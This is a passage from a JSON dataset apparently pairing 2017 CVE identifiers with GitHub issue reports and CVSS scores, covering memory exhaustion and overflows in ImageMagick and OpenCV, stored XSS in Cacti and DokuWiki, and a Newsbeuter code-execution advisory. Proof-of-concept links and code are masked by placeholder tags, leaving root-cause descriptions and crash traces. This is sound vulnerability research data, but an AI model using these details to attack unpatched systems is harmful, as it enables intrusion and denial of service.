NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffb NUMBERTAG b6ffb NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG bfd8c NUMBERTAG bfdad NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG f NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG fd6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bd NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG baef7a in APITAG APITAG NUMBERTAG baef7a in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG baf5e in APITAG APITAG NUMBERTAG bea NUMBERTAG in APITAG APITAG NUMBERTAG ec NUMBERTAG d8 in APITAG APITAG NUMBERTAG fc9e NUMBERTAG in APITAG APITAG NUMBERTAG d9a in APITAG APITAG NUMBERTAG ca in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG a ( PATHTAG ) POC URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12806",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/660",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/660",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-08T03:28:18Z",
        "description": "memory exhaustion in format8BIM. PATHTAG convert oom format8BIM /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG e8d NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG a NUMBERTAG ffff NUMBERTAG b1f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b2a NUMBERTAG b2b NUMBERTAG b2c NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5abb NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG PATHTAG NUMBERTAG b5c NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e2b NUMBERTAG PATHTAG NUMBERTAG b6e2b NUMBERTAG b6e2c NUMBERTAG PATHTAG NUMBERTAG b6e2c NUMBERTAG b6e2d NUMBERTAG PATHTAG NUMBERTAG b6e2d NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6fdb NUMBERTAG PATHTAG NUMBERTAG b6fdb NUMBERTAG b6fdd NUMBERTAG PATHTAG NUMBERTAG b6fdd NUMBERTAG b6fde NUMBERTAG PATHTAG NUMBERTAG b6fde NUMBERTAG b6fe NUMBERTAG b6fe NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffa NUMBERTAG PATHTAG NUMBERTAG b6ffa NUMBERTAG b6ffb NUMBERTAG PATHTAG NUMBERTAG b6ffb NUMBERTAG b6ffd NUMBERTAG b6ffd NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG dso NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bd NUMBERTAG b NUMBERTAG be NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG b NUMBERTAG bf NUMBERTAG PATHTAG NUMBERTAG bfa NUMBERTAG bfa7a NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG df4c1 ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e8e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG de NUMBERTAG c in format8BIM APITAG NUMBERTAG e NUMBERTAG c in APITAG APITAG NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG ed NUMBERTAG c in APITAG APITAG NUMBERTAG fd NUMBERTAG in APITAG APITAG NUMBERTAG f2 in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e4ba NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG c5a ( PATHTAG ) POC URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12847",
        "Issue_Url_old": "https://github.com/NagiosEnterprises/nagioscore/issues/404",
        "Issue_Url_new": "https://github.com/nagiosenterprises/nagioscore/issues/404",
        "Repo_new": "nagiosenterprises/nagioscore",
        "Issue_Created_At": "2017-07-28T20:39:10Z",
        "description": "nagios daemon should create its PID file before dropping privileges. Summary The nagios daemon should create its PID file before dropping privileges. This represents a minor security issue; additional factors are needed to make it exploitable. Description The purpose of the PID file is to hold the PID of the running daemon, so that later it can be stopped, restarted, or otherwise signalled (many daemons reload their configurations in response to a SIGHUP). To fulfill that purpose, the contents of the PID file need to be trustworthy. If the PID file is writable by a non root user, then he can replace its contents with the PID of a root process. Afterwards, any attempt to signal the PID contained in the PID file will instead signal a root process chosen by the non root user (a vulnerability). This is commonly exploitable by init scripts that are run as root and which blindly trust the contents of their PID files. If one daemon flushes its cache in response to SIGUSR2 and another daemon drops all connections in response to SIGUSR2, it is not hard to imagine a denial of service by the user of the first daemon against the second. Exploitation There is only a risk of exploitation when some other user relies on the data in the PID file. But you have to wonder, what's the point of the PID file if not to provide the PID to other people? Any situation where the PID file is used is therefore suspicious. The init script APITAG that ships with nagios itself relies on the PID file to e.g. reload the nagios configuration.",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.3,
        "impactScore": 5.2,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2017-12852",
        "Issue_Url_old": "https://github.com/numpy/numpy/issues/9560",
        "Issue_Url_new": "https://github.com/numpy/numpy/issues/9560",
        "Repo_new": "numpy/numpy",
        "Issue_Created_At": "2017-08-15T03:02:02Z",
        "description": "missing input validation . When I test librosa library for speech recognition, I found a bug in APITAG and APITAG function which used numpy.pad function. In my test, it will stick into infinite loop ,once accepted a empty list or ndarray, the numpy.pad function will stick into infinite loop. Although the comment says that the function need a rank NUMBERTAG array, but I think it still need to check the input array to avoid the above problem. Look forward to your reply!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12856",
        "Issue_Url_old": "https://github.com/cooltey/C.P.Sub/issues/2",
        "Issue_Url_new": "https://github.com/cooltey/c.p.sub/issues/2",
        "Repo_new": "cooltey/c.p.sub",
        "Issue_Created_At": "2017-05-07T02:02:06Z",
        "description": "Cross site Scripting (XSS). parameter value without rigorous filtration FILETAG Poc Payload\uff1a URLTAG Vesrion NUMBERTAG FILETAG keyword does not check the output and input points, resulting in code triggering FILETAG Resolving: Filtering encoding or escaping",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12862",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9370",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9370",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-08-15T06:14:56Z",
        "description": "APITAG in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ > Detailed description APITAG trigger the heap buffer overflow APITAG version from NUMBERTAG to NUMBERTAG affected Root cause: in PATHTAG NUMBERTAG int bit_depth = CV_ELEM_SIZE1(m_type NUMBERTAG int src_pitch = (m_width m_bpp bit_depth NUMBERTAG APITAG _src(src_pitch NUMBERTAG uchar src = _src NUMBERTAG for NUMBERTAG m_width; x++ ) src[x] = APITAG m_strm NUMBERTAG In my poc, the m_width is about NUMBERTAG bigger than src_pitch, which cause the \\_src buffer overflowed (gdb) p src_pitch NUMBERTAG a2c3 (gdb) p m_width NUMBERTAG gdb) p m_bpp NUMBERTAG gdb) p bit_depth NUMBERTAG Steps to reproduce APITAG poc is here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12863",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9371",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9371",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-08-15T06:18:34Z",
        "description": "integer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ Detailed description integer overflow in APITAG PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG bool APITAG Mat& img NUMBERTAG int src_pitch = (m_width m_bpp bit_depth NUMBERTAG int nch = CV_MAT_CN(m_type); int width3 = m_width nch; Steps to reproduce APITAG poc is here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12864",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/9372",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/9372",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2017-08-15T06:22:28Z",
        "description": "Integer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ Detailed description integer overflow in APITAG PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' static int APITAG APITAG strm, int maxdigits NUMBERTAG do { val = val NUMBERTAG code NUMBERTAG if( ++digits >= maxdigits ) break; code = APITAG } while( isdigit(code)); Steps to reproduce APITAG poc is here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12875",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/659",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/659",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-08T01:53:32Z",
        "description": "cpu exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG ./magick cpu poc2 /dev/null static APITAG APITAG APITAG magick_restrict APITAG magick_restrict nexus_info, APITAG exception) { ..... switch (cache_info >type) { case APITAG case APITAG { register Quantum magick_restrict q; / Write pixels to memory. / if ((cache_info >columns == nexus_info APITAG && (extent == APITAG ((size_t) extent))) { length=extent; rows NUMBERTAG UL; } q=cache_info >pixels+offset cache_info >number_channels; for (y NUMBERTAG y APITAG number_channels nexus_info APITAG q+=cache_info >columns cache_info >number_channels; } break; } case APITAG { / Write pixels to disk. / APITAG >file_semaphore); if APITAG == APITAG { ERRORTAG cache_info >cache_filename); APITAG >file_semaphore); APITAG } if ((cache_info >columns == nexus_info APITAG && (extent APITAG offset+offset cache_info >number_channels sizeof( p),length,(const unsigned char ) p); if (count != APITAG length) break; p+=cache_info >number_channels nexus_info APITAG offset+=cache_info >columns; } ..... } poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12904",
        "Issue_Url_old": "https://github.com/akrennmair/newsbeuter/issues/591",
        "Issue_Url_new": "https://github.com/akrennmair/newsbeuter/issues/591",
        "Repo_new": "akrennmair/newsbeuter",
        "Issue_Created_At": "2017-08-17T20:48:21Z",
        "description": "CVETAG ] Remote code execution. Dear users, Jeriko One discovered a vulnerability that allows a remote attacker to execute arbitrary code on your computer. An attacker can craft an RSS item with shell code in the title and/or URL. When you bookmark such an item, your shell will execute that code. The vulnerability is triggered when APITAG is called; if you abort bookmarking before that, you're safe. Newsbeuter versions NUMBERTAG through NUMBERTAG are affected. Workaround ========== First of all, set APITAG to no (that's the default.) This gives you a chance to review inputs before executing your APITAG . Second, when bookmarking items, pay close attention to titles and URLs. I can't possibly teach you how to recognize shell code in just a few paragraphs, so if unsure, just don't bookmark the thing. Resolution ========== A fix has already been pushed to our Git repository: URLTAG I managed to get in touch with maintainers in AUR, Debian, APITAG and Gentoo, so if you're running one of those, an update should arrive soon. If you're running something else, I encourage you to find out who maintains Newsbeuter for your distribution, contact them and point to the aforementioned commit. They'll know what to do. Call to security researchers ============================ If you discover a vulnerability, please disclose it to me privately at eual. EMAILTAG , preferably encrypting the message for PGP key NUMBERTAG A NUMBERTAG C8BFD NUMBERTAG APITAG has also been posted [on our mailing list URLTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12927",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/907",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/907",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-08-15T02:42:33Z",
        "description": "xss in FILETAG via para method. it's not a high level vuln, maybe medium or low line NUMBERTAG echo __(\"FATAL: Spike Kill method '%s' is Invalid \", APITAG should change into echo __(\"FATAL: Spike Kill method '%s' is Invalid \", APITAG FILETAG I should found this at issue NUMBERTAG I'm sorry for the delay chen ruiqi codesafe team of qihoo NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12978",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/918",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/918",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-08-19T10:53:44Z",
        "description": "Stored XSS in APITAG Lower risk, given that the account requires access to be able to add/edit external links to store the XSS, but line NUMBERTAG of FILETAG isn't sanitizing APITAG , resulting in stored XSS. CODETAG Although the title field in external_links is a varchar NUMBERTAG we can get around that restriction by creating multiple tabs and using comment blocks to keep the XSS valid: Create the first tab with title: APITAG Create second tab with title: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-12979",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2080",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2080",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2017-08-16T20:59:34Z",
        "description": "APITAG Stored XSS in FILETAG with code block. Bug Specific language parsed in code block is not checked or sanitized before rendering wiki content. Attacker can force admin to enable phpok in configuration through malicious javascript. Detail APITAG ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12980",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2081",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2081",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2017-08-16T21:12:14Z",
        "description": "APITAG Stored XSS in FILETAG with APITAG feed. Bug Author tag in APITAG feed is not well sanitized (with default config of APITAG it'll not be stripped html special characters, dokuwiki uses the result directly). So attacker can force others to request a remote APITAG feed contains malicious javascript to do requests in their permission. Detail APITAG ERRORTAG APITAG remote RSS ERRORTAG dokuwiki document APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12982",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/983",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/983",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-08-14T11:33:02Z",
        "description": "memory allocation failure in opj_aligned_alloc_n (opj_malloc.c). on NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12983",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/682",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/682",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-18T08:55:11Z",
        "description": "Heap buffer overflow in APITAG zhihua. EMAILTAG .cn ERRORTAG POC URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13058",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/666",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/666",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-10T16:09:37Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13059",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/667",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/667",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-10T16:10:04Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13060",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/644",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/644",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-04T08:54:02Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (bad free) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13061",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/645",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/645",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-04T08:54:55Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify PSD file , imagemagick will allocate memory to store the data, here is the critical code: psd.c , in function APITAG ERRORTAG The critical function call chain is APITAG APITAG APITAG in function APITAG ERRORTAG The string_info >length can be controlled by input file,here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13062",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/669",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/669",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-11T02:50:43Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-13083",
        "Issue_Url_old": "https://github.com/pbatard/rufus/issues/1009",
